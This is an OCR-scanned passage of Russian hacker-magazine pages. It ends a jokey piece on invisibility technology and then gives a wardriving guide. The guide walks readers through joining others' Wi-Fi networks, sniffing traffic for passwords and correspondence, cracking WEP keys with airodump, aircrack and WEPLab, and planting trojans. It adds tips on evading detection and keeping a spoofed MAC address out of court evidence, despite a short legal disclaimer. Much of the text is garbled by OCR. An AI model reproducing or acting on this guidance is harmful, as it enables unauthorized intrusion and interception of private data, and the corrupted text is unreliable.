дателя. Плащ имеет особое световозвраща- 
ющее покрытие. 

Вот такие навороты :-). Профессор Таши 
предложил несколько вариантов практичес- 
кого использования своего изобретения. 

Все они, похоже, были придуманы на ходу, 
так как выглядят несколько притянутыми за 
уши. Например предлагается сделать проз- 
рачной для летчика нижнюю часть кабины 
самолета, чтобы он мог непосредственно 
видеть, куда садится или кидает бомбу. 
Другой вариант - прозрачные руки и 
инструменты хирурга во время операции. 
Имитацию сего процесса демонстрирует ви- 
деоролик на сайте лаборатории 
(іійрУ/ргоіесІ$.5Іагіи- 

іокуо.ас.ір/ргоіесі$/МЕЛІА/хѵ/ітаде$/ос-рІіапіот.трд). 

Туг можно заметить лишь одно - плохому хи- 
рургу и руки мешают ;-). Пилоту, видимо, 
придется поначалу привыкать к зависанию 
своего тела над пропастью и воздерживать- 
ся от рефлекторного катапультирования - 
говорят, такое иногда случалось с летчика- 
ми, управлявшими ракетами с телевизион- 
ным наведением. 

И0СКИР9ЕНСЯ СВЕТОДИОДОИИ 

Идея отображать на скрываемом предмете 
динамичное изображение подстилающего 
фона стара как мир. Она является развити- 



леи на полимерных ОІ_ЕО-светодиодах, мощ- 
ные процессоры для обработки и корректи- 
ровки адаптивной картинки. Трудно, но 
вполне достижимо. Так, МАЗА приводит при- 
мерные расклады, что для маскировки со 
всех сторон объекта величиной с танк потре- 
буется оборудование весом всего ничего 45 
килограмм. 

В среде теоретиков-ботаников часто 
принято критиковать в пух и прах идеи не- 
видимости. Дескать, всего не спрятать и 
все равно что-то будет видно. А раз уж 
полную невидимость при современных тех- 
нологиях получить так сложно, то стоит ли 
корячиться изо всех сил? Однако практики- 
военспецы такую задачу и не ставят. Для 




В африканских прериях ставят дорожные знаки, предостере- 
гающие об опасности эффекта невидимости в природе 



степс: ВИДИМОСТЬ 
НЕВИДИМОСТИ? 




Легендарный истребитель-невидимка Р-117А с сомни- 
тельной способностью летать и быть незаметным 



Сама мысль о том, что враг 
может оказаться невидимым, 
способна сильно поколебать 
неустрашимость противника. 
Поэтому можно, например, со- 
орудить жуткий самолет-кра- 
козябру, обозвать его неви- 
димкой и раструбить об этом в 
прессе. Именно такова была 
судьба нашумевшей техноло- 
гии стеле. Взяли два самолета 
- большой и маленький, сплю- 
щили их, как камбалу, и полу- 
чили легендарные В-2 и Р-117, 
«невидимые» для радаров. 
Летные характеристики стали 
те еще - попробуй долететь, не 
вильнув в сторону. Эффектив- 
ная площадь отражения 
действительно поубавилась, 
но не исчезла вовсе. Факти- 
чески эти аппараты представ- 
ляют собой летающую ми- 
шень, потому что увернуться 
от атаки у них нет никаких 
шансов. Однако стеле стал 
весьма удачным фейком от 
пропагандистов Пентагона. В 
свое время этой штукой, так- 
же как и дутой программой 
СОИ, удалось задурить голову 
и напугать советское партий- 
ное руководство, заставляя 
тратить баснословные деньги 
на адекватный ответ. Доста- 
точно эффективные алгорит- 
мы распознавания самолетов- 
невидимок были разработаны 
без особых усилий. И вот сей- 
час, через 20 лет после появ- 
ления стелсов, выяснилось, 
что для их обнаружения вооб- 
ще никаких локаторов не нуж- 
но ;-). Самолеты, проносясь на 
высокой скорости, нарушают 
интерференционную картину, 
которую создают базовые 
станции сотовых операторов. 
По этим изменениям можно, 
например, вычислить, что ле- 
тит истребитель. Если при 
этом он дает на радаре умень- 
шенную засветку, как от стай- 
ки уток, это и есть наша «неви- 
димка». 
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успешного боевого применения вполне достаточно частичной невидимости, 
которую можно изготовить если не прямо сейчас, то в ближайшем буду- 
щем. Вспомни, как ловко бегал от железного Шварца Хищник, пока у него 
не закоротило прозрачность. Геймеры в ІІпгеаІ Тоигпатепі хорошо знают, 
как трудно в динамике боя отследить, в принципе, заметного врага, схва- 
тившего «стакан с невидимостью». Пожалуй, ученые стараются не зря. Час- 
тичная прозрачность и какая ни есть адаптивная маскировка все равно го- 
раздо эффективнее камуфляжа и размалеванного лица. 

Л ПРОТИВОБОРСТВО 

ТЕХНОЛОГИИ. СУПЕРЗРЕНИЕ 

Что же можно противопоставить активно маскирующимся буржуям? Первое, 
что приходит в голову, - это инфракрасные приборы и радары. Таскать все 
эти штуки на себе довольно утомительно. Однако ко времени, когда техноло- 
гии невидимости будут достаточно развиты, такие приборы будут доступны 
на уровне имплантатов. 

Искусственные фотоэлементы, вживляемые на место поврежденной сет- 
чатки, доступны уже сейчас. Активно внедряются нанотехнологии. Наноэле- 
менты с расширенным диапазоном частот позволят человеку видеть в инф- 
ракрасном и ультрафиолетовом примыкающих участках спектра. Сущест- 
венно увеличится число различимых глазом оттенков и градаций серого. 
Можно будет видеть в темноте и различать поляризованный свет. Кстати, 
все вражеские невидимки прекрасно наблюдаются в поляризованном свете. 
Это хорошо известно многим морским хищникам, особенно ракообразным 
и головоногим, которые запросто охотятся на прозрачных жертв. Интер- 
фейсные имплантаты сделают возможным предъявить глазу разного рода 
служебную информацию. Человек в буквальном смысле сможет взглянуть 
на мир другими глазами. Что он увидит, невозможно сегодня представить 
никакой киношной анимацией, ведь ее мы наблюдаем, опять же, обычным 
зрением. 

Кое-кто спешит стать всевидящим уже сейчас. Технология суперзрения - 
лазерной микрохирургии глаза - уже поставлена на поток, в том числе и в 
нашей стране. Буквально недавно ученые преодолели давний технологичес- 
кий барьер - аберрации высшего порядка при изготовлении оптики. Приме- 
няя метод коррекции волнового фронта, теперь можно создавать практически 
идеальные линзы, что раньше считалось теоретически невозможным. Пере- 
неся эту технологию на глазную лазерную хирургию, специалисты получили 
невероятные результаты. Компоненты глаза можно затачивать столь идеаль- 
но, что получается сверхчеловеческое зрение, например 200 или 300%! При 
этом зоркость становится соизмеримой со зрением кошки. Специалисты на- 
чали высказывать опасения, что психика человека не сможет выдержать не 
свойственный людям поток зрительной информации. Проще говоря, от нап- 
лыва деталей у новоявленного сверхчеловека просто снесет башню. Поэтому, 
если ты решишь снять очки в клинике лазерной хирургии, будь предельно 
осторожен в своих запросах. 

НЕВИДИМОСТЬ В ГОЛОВЕ 



Давай немного пофилософствуем. Цвет и образ не 
являются неотъемлемыми свойствами объекта. 
Скорее, это свойства восприятия наблюдателем. 
Ведь предмет не является красным сам по себе - с 
точки зрения человека и собаки он будет разным. 
Так и невидимости можно достичь, заставив чело- 
века не воспринимать предмет. Научный факт: под 
гипнозом тебе могут внушить, что у тебя, напри- 
мер, нет системного блока - и ты реально переста- 
нешь его замечать. Долго будешь ходить по комна- 
те, пялиться по сторонам и недоумевать, как это 
комп работает без системника. Один мой приятель 
серьезно помешан на психотехнике, экстрасенсо- 
рике и прочей лабуде: постоянно делает пассы ру- 
ками и настраивает ауру... Так вот, он утверждает, 
что способен так воздействовать на встречных га- 
ишников, что они его автомобиль просто не видят 
на дороге, хотя радар у них пищит. Над этим мож- 
но долго смеяться и даже сочувствовать, пока сам 
не убедишься, что это работает. Наверное, дистан- 
ционно срабатывают некие флюиды сверхнаглос- 
ти, которые излучают люди, твердо уверенные в 
своих суперспособностях ;-). 





УДОБСТВУ 



оісііск 323 М 
ОрбсаІ Мойве 



окііск 780 І_ 
МиШтебіа КеуЬоагб 



і Когда-то в древности Великий Учитель решил испытать 
ш своих учеников, предложив им выбрать для себя мечи. 

° Один ив них выбрал легкий меч, надеясь сохранить силы 
§ в долгом походе. Другой выбрал длинный меч, надеясь 
| поразить им больше противников с безопасного 
р расстояния. 

ш Но самым мудрым оказался третий ученик, который 
^ выбрал для себя самый удобный меч, ставший продолже- 
Зі нием его руки. 

Р Удобство — вот разумный выбор! 






'Л 



К ак-то раз девушка одного моего друга, услышав от него 
по мобильному фразу «Мы сейчас на Тверской вардрай- 
вим, пока никого не подцепили, перезвоню позже», уст- 
роила ему жуткий скандал. Очень сложно было втолковать рани- 
мой особе, что термин «вардрайвинг» хоть и связан очень тесно 
с Тверской улицей, однако носит исключительно компьютерный 
характер. Чтобы хотя бы у тебя не возникало таких проблем, 
не пропусти! Прямо сейчас! Вся правда о вардрайвинге. 






ш Швдд. 

Ч ем же мы занимались на Тверской 
и кого пытались подцепить? Дело 
все в том, что и у меня, и у моего 
друга есть ноутбук с ѴѴі-Рі -адапте- 
ром на борту. И поскольку мы очень любим 
изучать технологии, то время 
от времени выбираемся в центр, чтобы пове- 
селиться, подключаясь к беспроводным сетям 
многочисленных организаций, которыми прос- 
то-таки усеян весь центр Москвы. Какие цели 
мы преследуем? Ну хотя бы и так: поснифать 
чужой трафик и посидеть на халяву в инете. 

На первый взгляд может показаться, что сде- 
лать это сложно. Вовсе нет. Порой для этого 
совсем не обязательно эксплуатировать ка- 
кие-то уязвимости, ведь часто создатели сети 
делают все для того, чтобы поломать их сис- 
тему было проще простого. 

Когда я только начинал заниматься ѴѴі-Рі-сетя- 
ми, передо мной стояла целая гора вопросов. 



Самый первый из них заключался в том, какое 
железо использовать. Ответ на самом деле 
ожидаемый: по существу, это не так уж и важ- 
но, можно заставить работать любую железя- 
ку. Например мой друг использует встроен- 
ный в ноутбук ѴѴі-Рі -адаптер, а я купил отдель- 
ную РСМСІ -карточку, поскольку у меня древ- 
ний ноут. Однако можно дать несколько прос- 
тых советов. Прежде всего, бери карточку на 
чипсете Ргізітп или Ргізт2. Советую это сде- 
лать, даже если у тебя в ноуте есть интегри- 
рованный адаптер, поскольку если он работа- 
ет не на этом чипсете, то ты можешь забыть о 
полноценном пользовании ѴѴі-Рі :). Подходя- 
щая РСМСІ-карточка стоит около $50. 

Также рационально брать карточку с возмож- 
ностью подключения внешней антенны. Если 
ты собираешься быть настоящим ѴѴі-Рі-гуру, 
возможности встроенной антенны уже в ско- 
ром времени перестанут устраивать тебя. 
Вообще выбор железа - это очень индивиду- 
альный вопрос, поэтому я не буду с пеной у 
рта советовать тебе конкретные модели. Я-то 



свой выбор сделал уже давно. Вот моя конфи- 
гурация: НР ОтпіВоок 900 Огіпосо СоІсІ + 
Негтез РСМСІА СагсІ. Что касается внешней 
антенны, то, конечно, если у тебя есть куча 
денег, логично купить красивую фирменную 
антенну и не париться. Однако опыт показыва- 
ет, что ее можно изготовить самостоятельно и 
она будет прекрасно работать. Вообще, в ине- 
те очень много об этом пишут, даже приводят 
чертежи. Могу тебе сказать, что есть даже 
несколько типов антенн, которые можно изго- 
товить в домашних условиях! Хорошие резуль- 
таты показывают так называемые спиралевид- 
ные антенны, об их изготовлении почитать 
можно здесь: Шр://оуа.огд.иа/1ЛІі-Рі/11Ѵі-Рі-!іеІіх- 
Ішіо.МтІ. 

Также очень популярны баночные антенны, в 
которых роль принимающего контура играет 
банка из-под ананасов «Дядя Ваня», кофе или 
краски. Почитать об изготовлении таких ан- 
тенн можно здесь: ѵѵѵѵѵѵ.іигпроіпі.пеіМігеІе$з/сапіеп- 
паішіо.МтІ и 

ѵѵѵѵѵѵ.огеіІІупе1:.сот/с$/ѵѵеЫод/ѵіеѵѵ/ѵѵІд/448. А по этой 
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ВЫБИРАЕМ СОФТ 



Главное место среди всего софта для атаки на беспроводные 
сети занимает сканер №1ѵѵогк ЗШЬтІег (ѵѵѵѵѵѵ.пеМитЫег.сот). 
Он позволяет обнаруживать беспроводные сети и получать 
массу информации. Можно определить имена и названия се- 
тей, производителя оборудования, узнать, применяется ли 
шифрование для передачи данных, и т.д. Если у тебя есть 
ОРЗ-приемник, Нетстамблер будет записывать координаты об- 
наруживаемых точек доступа, уровень сигнала и прочую ин- 
формацию в отдельный файл, по которому ты легко сможешь 
создать карту с отмеченными на ней точками доступа. Этот 
инструмент по праву занимает лидирующее место. Он поддер- 
живает почти все существующие на сегодняшний день сетевые 
адаптеры, полностью бесплатен и гибко настраивается под 
конкретного пользователя. 

В свойствах ІМеІЗШтЫег'а я перечислил также все данные о 
сети, которые нас интересуют. Зная название сети (так называ- 
емый идентификатор 55Ю), вид используемого шифрования и 
уровень сигнала, уже можно проникнуть в нее. Подключение в 
сеть осуществляется при помощи программ, прилагаемых к 
сетевой карточке, либо с использованием специального софта. 
Я остановил свой выбор на Воіпдо ѴѴігеІезз (ѵѵѵѵѵѵ.Ьоіпдо.сот). Эта 
программа распространяется бесплатно и позволяет присоеди- 
няться к любой сети, в зоне действия которой ты находишься. 
Для соединения достаточно наличия хотя бы одного зеленого 
квадратика, символизирующего уровень сигнала. Отловив с по- 
мощью ІМеІЗШтЫег'а интересующую сеть, нужно дождаться, по- 
ка она появится в списке Воіпдо, и нажать на кнопку «Соппесі». 
Дальше возможны два варианта: подавляющее большинство то- 
чек доступа (Ассезз Роіпіз, или сокращенно АР) имеет встроен- 
ный ОНСР-сервер, который при подключении присваивает ІР- 
адрес. Если ты подключаешься к сети с ЗЗЮ вроде сІеТаиІІ:, это 
верно практически в 100% случаев. 

Но есть и другой вариант, при котором ЭНСР отсутствует или 
заблокирован. Чтобы работать в такой сети, надо будет при- 
ложить некоторые усилия. 

Ты, конечно, не раз слышал о пакетных сниферах - софте, ко- 
торый позволяет получить доступ к пакетам, проходящим по 
сети. Из-за специфики беспроводных сетей получить доступ к 
передаваемым пакетам данных может любое устройство в зо- 
не действия сети. Как ты знаешь, в любом ТСР-пакете есть 



такие поля, как ЗОІІВСЕ ІР и ОЕЗТІИАТІОМ ІР. Следовательно, 
если ЭНСР отключен, то узнать используемую в сети адреса- 
цию довольно легко - нужно всего лишь наснифать пару де- 
сятков пакетов. 

После того как сетевая карточка подключилась к ѴѴі-Рі-сети и 
ей уже присвоен уникальный ІР-адрес, можно шариться по сет- 
ке, выступая в роли обыкновенного локального устройства. 
Можно просканировать весь ІР-диапазон на открытые порты 
80, 8080, 3128. Эти порты соответствуют НТТР-проксям, и не 
раз бывало, что я отправлял письма своей девушке, находясь в 
ста метрах от здания Администрации президента РФ :). Можно 
вспомнить былое и просканировать сеть на расшаренные ре- 
сурсы, попробовать поискать машины с ЭСОМ -уязвимостями, 
поставить на поломанные компьютеры троянцев и ВАТ. В об- 
щем, в открытой ѴѴі-Рі-сети клиенты защищены так же, как и 
сама сеть, то есть никак. 




№1$1итЫег в действии: в окрестностях редакции журнала 



Тірз&Тгіскз 



Если твоя локалка большая и тебя постоянно флудят сообщениями (сейчас 
везде стоят ХР), а лазить в службы надоедает - создай два ЬаГника, в од- 
ном напиши "пеі зіор Меззепдег", а в другом "пеі зІагТ Меззепдег". Первый, 
как можно догадаться, останавливает, а второй запускает службу 




ссылке можно найти очень забавную статью, в 
которой сравниваются возможности фабрич- 
ной антенны и баночного самопала: ѵѵѵѵѵѵіигп- 
роіпі.пеі/ѵѵігеіезз/ііаз.іііті. 

Следует также отметить, что внешняя антенна 
нужна только для работы со слабым сигналом 
на значительном расстоянии. Опыт показыва- 
ет, что в центре города спокойно можно обой- 
тись и без отдельной антенны, поскольку все 
расположено компактно, расстояние между 
точками доступа очень маленькое и к многим 
из них можно подобраться совсем близко. 
Итак, с оборудованием мы определились. Сле- 
дующий вопрос, который тебя наверняка бес- 
покоит, заключается в том, какую операцион- 
ную систему использовать. Не следует думать, 
что надо обязательно ставить на ноут І_іпих 
или, что еще более ужасно, РгееВЗЭ. Не стоит 
также обращать особого внимания на миф о 
том, что ѴѴіпсІоѵѵз - это ОС для домохозяек. Я, 
например, использую ѴѴіпсІоѵѵз 2000, а у друга 
стоит как раз Шпих. Так вот что я тебе скажу: 
мы с ним замечательно дополняем друг друга, 




Прекрасные антенны можно сделать из 
упаковки чипсов «Прингле» или любого 
самого похабного косре 



если вдуматься - идеальная пара! :) 

Думаю, тебе захочется не возиться с юниксом, 
а попробовать провести свои эксперименты 
прямо под виндой. Туг есть одно «но». Ни один 
толковый вардрайвер не посоветует тебе 
юзать ѵѵіп хр - она создает кучу ненужных 
сложностей. Например после того как хр под- 
соединится к какой-нибудь ѴѴі-Рі-сети, могут 




Вардрайвер за работой 



возникнуть проблемы с отсоединением от нее 
и реконнектом в другую сеть. Дело доходит до 
физического вытаскивания карточки из гнезда 
и остановки сервиса, отвечающего за ѵѵігеІезз 
соединения. Так что лучше юзать ѵѵіп2к. 
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■№ ! 

Однако все, что я писал выше, верно лишь 
для сетей, в которых не применяется никакого 
шифрования данных. По статистике к этой ка- 
тегории относится примерно 70% точек досту- 
па. Это мировая статистика, и будь то Москва, 
Лондон, Нью-Йорк или Пекин, она не сильно 
отличается в ту или иную сторону. Еще при- 
мерно 25% точек доступа защищены протоко- 
лом ѴѴЕР, шифрующим передаваемые данные. 
Что это такое, как работает и какие недостат- 
ки есть в этом протоколе, ты можешь прочи- 
тать в статье Тохи, которую мы напечатали в 
этом же номере. Он там здорово прогрузил с 
теоретическими выкладками и все подробно 
объяснил. Но нас сейчас теория мало волнует, 
так ведь? :) 

На приведенном скриншоте Нетстамблера 
видно, что на некоторых АР перед 83Ю стоит 
замочек. Это означает, что в этой сети ис- 
пользуется шифрование данных и для работы 



с ней нужно знать специальный ключ. При 
подключении к защищенной сети при помощи 
Воіпдо появится диалоговое окно для ввода 
ключа, которого мы не знаем. Что же делать? 
Читать статью Токсы! 

Примерно с лета 2001 года взлом ѴѴЕР, конеч- 
ный результат которого заключается в том, 
что мы будем иметь на руках пароль для дос- 
тупа в сеть, представляет собой простейшую 
задачу, правда, требующую значительного 
времени. Существует огромное количество 
утилит, в основном, портированных с І_іпих- 
систем на платформу ѴѴіпсІоѵѵз, которые вы- 
полняют эту задачу. Лучшей по всем показате- 
лям является Аігсгаск, написанная специалис- 
том в области беспроводных технологий Крис- 
тофером Девайном 

). Этот 

полноценный программный комплекс для 
взлома ѴѴЕР представляет собой две малень- 
кие утилитки: аігосіитр.ехе и аігсгаск.ехе. Ис- 
пользование их чрезвычайно просто. Сначала 
нужно запустить аігосіитр.ехе: 




Кпоѵѵп пеіѵѵогк асіаріегз: 



3 Огіпосо бокі Негтез РСМСІА СагсІ (5(Ш) 

9 ЗСот ЕИіегІМ III ШІ РС СагсІ (ЗС589Р) (ЕНіетеі) 

Мѵѵогк іпіегЕасе іуре -> о 
ІМѵѵогк іпМасе іпсіех ■> 3 
ѴѴігеІезз сііаппеі Іі$1 -> 6 
Оиіриі ЛІепате ргеЛх -> ту.зирег.Іод 
МАО ЛІІег (р = попе) ->р 



В результате в файле ту.зирег.Іод будут ле- 
жать все перехваченные пакеты из сети, в ко- 
торой применяется ѴѴЕР-шифрование. После 
того как задампилось достаточное количество 
пакетов, следует скормить этот файл второй 
утилите аігсгаск.ехе, которая, собственно го- 
воря, и возьмет на себя весь процесс взлома. 



Но тут возникает несколько «но»: 




ЩЖіШ- 

На мой взгляд, самое главное и ценное ору- 
жие Упих-хакеров - это программный продукт 
Кізтеі (шѵѵ.кі$теіѵѵігеІе$$.пеі). Эта офигенная 
софтина, которая, по сути, является сетевым 
снифером ѴѴі-Рі, ничуть не уступает по функ- 
циональности ІМеІЗІитЫег'у. Кроме всего про- 
чего, эта программа поддерживает огромное 
количество адаптеров под І_іпих, позволяет 
сканировать одновременно несколько беспро- 
водных сетей и многое другое. 

Для взлома ѴѴЕР под линуксом используются 
те же самые аігсгаск и аігбитр. 



т конкуренция 

На самом деле за кажущейся простотой взло- 
ма беспроводных сетей кроется огромная куча 
подводных камней, которые так сразу и не 
разглядеть. Однако есть масса людей, кото- 
рые преодолели все эти трудности и встали 
на шаткую дорожку вардрайвинга. 

В США, где точками доступа оборудованы чуть 
ли не уличные туалеты, это является уже поч- 
ти национальным спортом людей, имеющих 
ноутбуки. У каждого уважающего себя стамб- 
лера имеется карта местности, где он прожи- 
вает или работает. Используя ОРЗ-приемник 
для вычисления координат точки доступа, они 
наносят их на карту. Именно карты города или 
района с нанесенными на них точками доступа 



являются показателем элитности. Многие из 
стамблеров специально путешествуют по 
стране, стремясь обнаружить как можно боль- 
ше точек доступа и составить доказательство 
обнаружения. Если у тебя есть ОРЗ-приемник, 
то же самое можешь делать и ты. Более того, 
вряд ли это нарушает какие-то законы, ты же 
никому не мешаешь своими действиями, это 
своего рода коллекционирование, которое, по 
сути, ничем не отличается от сбора статисти- 
ки по используемым в Сети операционным 
системам и браузерам. 

Как же это делается на практике? И 
МеІЗІитЫег, если у тебя ѴѴіпсІоѵѵз, и Кізтеі, в 
случае использования І_іпих, способны вычис- 
лять координаты точек доступа, получаемые с 
СРЗ. Затем, используя, скажем, программу 






оо 



О В начале статьи я предупредил, что исполь- 
зуемый тобой ѴѴі-Еі-адаптер должен быть сов- 
местим с чипсетом РВІЗМ, РПІ8М2. В против- 
ном случае аігосіитр у тебя работать не будет. 
О Для успешного взлома ключа необходимо 
собрать минимум 200 000 пакетов, если при- 
меняется 64-битный ключ шифрования, и ми- 
нимум 500 000 пакетов для 1 28-битного. Мож- 
но особо не заморачиваться, что перехвачен- 
ные пакеты должны быть с уникальными IV, 
так как доля уникальных IV в общем потоке 
трафика составляет примерно 95%. 

Ѳ К сожалению, чтобы собрать примерно 
миллион пакетов, надо просидеть около инте- 
ресуемой сети порядка 2-5 часов. Но чем 
больше данных ты соберешь, тем больше ве- 
роятность, что ѴѴЕР-ключ будет взломан бук- 
вально в течение одной минуты. 

Если же у тебя ни аігбитр, ни аігсгаск ни в ка- 
кую не хотят работать, то можешь попробо- 
вать еще одну утилиту для взлома ключа под 
названием ѴѴЕРІаЬ (Шр://ѵѵерІаЬ.$оигсе(огде.пе1). 

Каким образом ты соберешь пакеты, ее не 



волнует, а для взлома ѴѴЕР надо всего лишь 
указать параметры шифрования и файл с зах- 
ваченными пакетами: 



В:Ші\иерІаЬ траскеі$.рсар -кеу 128 іезіегз.рсар 



Самый лучший на сегодняшний день пакетный 
снифер для ѴѴі-Рі-сетей - это АігоРеек ІМХ 
(ѵѵѵѵѵѵ.ѵѵіісіраскеіз.сот/ргосіисіз/аігореек). Он умеет не 
только декодировать все ѴѴІАІМ -пакеты, но и по- 
лучать полную информацию о производитель- 
ности исследуемой сети, точном уровне сигна- 
ла. И его цена, которая составляет $3к (!) за го- 
довую лицензию, полностью себя оправдывает. 
Но, опять же, он работает только с карточками, 
совместимыми с чипсетом Ргізт :(. 

Подведем небольшой итог: используя ноутбук 
с ѴѴіпсІоѵѵз 2000 и указанным выше софтом, 
задача проникнуть в сеть ѴѴі-Рі, открытую или 
защищенную ѴѴЕР, не потребует большого ко- 
личества мозгов! 

Даже не входя в сеть и используя ѴѴі-Рі-сни- 
феры, можно перехватывать пакеты, внутри 
которых реально отыскать пароли на секрет- 



ные ресурсы, чужую переписку и т.д. 

Постой, помнишь, я рассказывал тебе о своем 
друге, который юзает І_іпих для атак на бесп- 
роводные сети? Как же поступает он? 




утилит для взлома ѴѴЕР с $есигіІу(оси$.сот 




ЗШтЬѵеіІег (ѵѵѵѵѵѵ.зопаг-зесигііу.сот), которая обра- 
батывает логи сканеров, можно наносить точки 
на растровые изображения карт местности. 
Именно это занятие получило историческое наз- 
вание ѵѵагсігіѵіпд, «боевое вождение», а люди, ко- 
торые этим занимаются, называются ѵѵагсігіѵегз. 
Так как в США машину не водит только ленивый, 
термин ѵѵагсігіѵіпд подразумевает, что для пере- 
мещения по местности используется четырехко- 
лесное транспортное средство :). 

Но кроме вардрайвинга существует огромное 
количество схожих терминов. Скажем, ѵѵаг- 
Ьоайпд - обнаружение беспроводных сетей 
при помощи плавательных средств, или ѵѵаіііу- 
іпд - при помощи летательных аппаратов. У 
тебя на лице проскочила усмешка? Наверное, 
ты не был в Питере. Нет ничего приятнее для 



л Помни, что взлом 
беспроводных се- 
тей мало чем отли- 
чается от проник- 
новения в обычные 
с точки зрения за- 
конодательства. Не 
стоит портить себе 
жизнь, амиго. Все, 
что написано в этой 
статье, приведено 
лишь для ознаком- 
ления и привлече- 
ния внимания об- 
щественности к 
проблеме безопас- 
ности в ѴѴі-Рі-сетях. 



Как работают $3000: на фоне отловленных зашифрованных пакетов можем видеть 
многообразие фильтров 
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Советы начинающему вардрайверу 

Перед тем как я отпущу тебя на вольные вардрай ви н говые хлеба, хочу 
дать несколько практических советов: 

* При вардрайвинге следует переименовать название своего компьюте- 
ра с ВеаІѴѴі-РіНаскег на что-нибудь поскромнее, не притягивающее 
взгляда администратора сети при просмотре лог-файлов с точек досту- 
па. Названия типа ѵѵогкзІаІіоп21 , ІапЬаскир или изег 1 23 выглядят менее 
угрожающе. 

* Если находиться на одном месте длительное время при взломе беспро- 
водной сети, это может обернуться серьезными проблемами со службой 
охраны. Ведь как только факт вторжения в сеть заметят, вычислить твои 
координаты не составит труда. Чем мощнее у тебя антенна, тем дальше 
от точки доступа ты можешь находиться. Сам стандарт ѴѴі-Рі 802.1 1 Ь 
декларирует 300 метров. Но в городских условиях эта цифра можешь 
значительно варьироваться. А если уж ты проникаешь в защищенную 
сеть или сеть какой-нибудь корпорации, использование мощных антенн - 
единственный способ не попасться в руки службы безопасности. 

* Следует также обязательно сменить МАС-адрес сетевой карты. Все 
дело в том, что при подсоединении к сети МАС передается в обязатель- 




ном порядке роутеру. По этому идентификатору тебе могут заблокиро- 
вать доступ к сети, но самое отвратное, что может произойти, - это ес- 
ли МАС-адрес твоей карточки будут использовать как доказательство в 
судебном процессе. Пользователи ѴѴіпсІоѵѵз для смены мака могут ис- 
пользовать утилиту ІІЗТ.МассІас 

(ѵѵш.и5ііпІо.ги/ргоіесі5/и5І.тассІак2к.гаг). После изменения значения 
нужно перезагрузить интерфейс - вытащить и вставить сетевую карту на 
место. 

* Сидеть у входа в офис компании в пять утра в майке журнала «Хакер» 
и с ноутбуком, обклеенным логотипами хакерских групп, - тоже не луч- 
шая идея. 

* И самое последнее. Не надо быть вандалом. Не надо нарушать зако- 
нов страны, в которой ты живешь. Не уничтожай ничего в сети, даже ес- 
ли она открыта каждому встречному. Помни, не ты один такой умный, и 
сеть, в которой ты сегодня пошалил, до этого полгода использовал я 
для скачивания фильмов из интернета. Так что не надо портить друг 
другу малину. 



л Получить информацию об изготовлении 
антенн можно по этим адресам: 

ІШр : //оуа . огд . иа/Ѵ\Л - Рі/ѴѴі - Рі - ИеІ іх- Иоѵѵіо . Иіт I 
Ийр://сцЬат.ш/сапІеппа.Ыт 
шм.цзІ.пеѴпІ Ьѵ\Л/сопіепІ$.Щт 
ѵѵѵѵѵѵ.заипаІаІі(іЛі/еІераІ/апІеппа2.Іі1тІ 



вардрайвера стать ненадолго варбоатером, 
передвигаясь на экскурсионном катере по уз- 
ким каналам в центре города. И это все для 
тебя. Офисы с двух сторон. Экскурсия длится 
два часа, и заряда батареек в твоем ноутбуке 
хватит на столько же. 







Результат работы одного из американских вардрайверов 



Язык вардрайверов 



Впрочем, машина предоставляет вардрайверу 
огромное преимущество: питание от прикури- 
вателя даст намного больше возможностей и 
времени для работы с беспроводными сетями 
:). Тонированные стекла скроют тебя от глаз 
любопытных, а теплая печка спасет от зимне- 
го мороза. Ты передвигаешься по улицам в 
поиске ѴѴі-Рі и при обнаружении сети с инте- 
ресным 55Ю останавливаешься и исследуешь 
ее более детально :). 

Ах, ты любитель метрополитена, спортсмен, 
ненавидишь педали и ручку тормоза, но хо- 
чешь гулять по улицам, также обнаруживая ѴѴі- 
Рі? Без проблем, клади ноутбук в рюкзак - и 
вот ты уже ѴѴагЗМег. ѴѴагЗІгоІІіпд - это скани- 
рование местности на своих двоих. Тут-то ты 
и поймешь, что на улице сейчас не май ме- 
сяц. Доставать при куче народу свой ноутбук и 
смотреть, что же он там обнаружил, тоже не 
совсем удобно. Какие же есть выходы? Ну, 
первое, что нам облегчает жизнь, - это тот 
факт, что и Кізтеі, и Меізіитіег умеют зачиты- 
вать инфу об обнаруженных сетях голосом. 
Поэтому ноутбук можно из сумки и не выни- 
мать, а подсоединить к нему наушники и, идя 
по улице, слышать информацию обо всех об- 
наруживаемых сетях. Найдя что-нибудь инте- 
ресное, можно зайти во двор или ближайшее 
кафе и там уже достать свой компьютер. 

Но есть способ потехнологичнее. Твой КПК, на 
котором ты раньше только книги читал, тоже 
способен оказать значимую помощь. Во-пер- 
вых, есть аналог МеІЗШтЫег для РоскеІРС 
2002/2003 под названием МіпіЗШтЫег 
(шѵшЫитЫег.сот). То есть если на твоем КПК 
есть встроенный ѴѴі-Рі -адаптер или СР-слот с 
ѵѵігеіезз адаптером (для РоскеіРС стоит поряд- 
ка $80), то ты легко сможешь сканировать се- 



ти на КПК, а лезть в сеть уже с ноутбука. Если 
есть тот же ВІиеТооІІі и у тебя стоит Таигііз 
или І_іпих, ты можешь использовать клиент 
для КізтеТа, позволяющий получать все дан- 
ные с ноутбука. 



ДРАИВИНГ 




ЛЛЕИБУСЕ 



Сколько я ни читал статей, а так и не нашел ни 
одного упоминания об использовании общест- 
венного наземного транспорта для сканирова- 
ния ѴѴі-Рі-сетей :). В условиях мегаполиса это 
может оказаться классным решением. Лучше 
всего троллейбусы: двигаются они медленно, 
каждую обнаруживаемую сеть можно исследо- 
вать. Для жителей Москвы советую маршрут 
«Б», движущийся по Садовому кольцу. Вокруг 
одни офисы, частые пробки. Зато тепло! Един- 
ственная проблема - бабульки, которым очень 
интересно узнать, что же у тебя там мерцает 
на экране. Хотя это на 100% лучше камер 
внешнего наблюдения и группы захвата.^С 




л На нашем диске 
ты найдешь 
описываемый в 
статье бесплатный 
софт как под Ііпих, 
так и под ѴѴіпсІоѵѵз. 



Рано или поздно ты найдешь сеть какой-нибудь интересной 
организации (например Федеральной службы охраны, она ловится в 
районе Новой площади в Москве) и тебе захочется поделиться этой 
информацией с другим вардрайвером. Для этих целей был придуман 
специальный язык, описывающий символами конкретную точку доступа. 
Это направление получило название ѵѵагсііаікіпд. Вот несколько 
небольших примеров. 

* Открытая сеть обозначается так: 

55Ю 



* Закрытая сеть - та, у которой не транслируется 35Ю: 
35Ю 
0 

ВѴѴАС 



* Сеть с использованием ѴѴЕР: 
53Ю 




ВѴѴ - размер канала (2 Мб, 1 1 Мб, 33,6 Кб), АС - информация о точке. 
* Более продвинутые записи могут иметь следующий вид: 



СН - на каком канале работает точка доступа (МеІЗІитЫег вам покажет 
:)), 5Т - качество сигнала. 
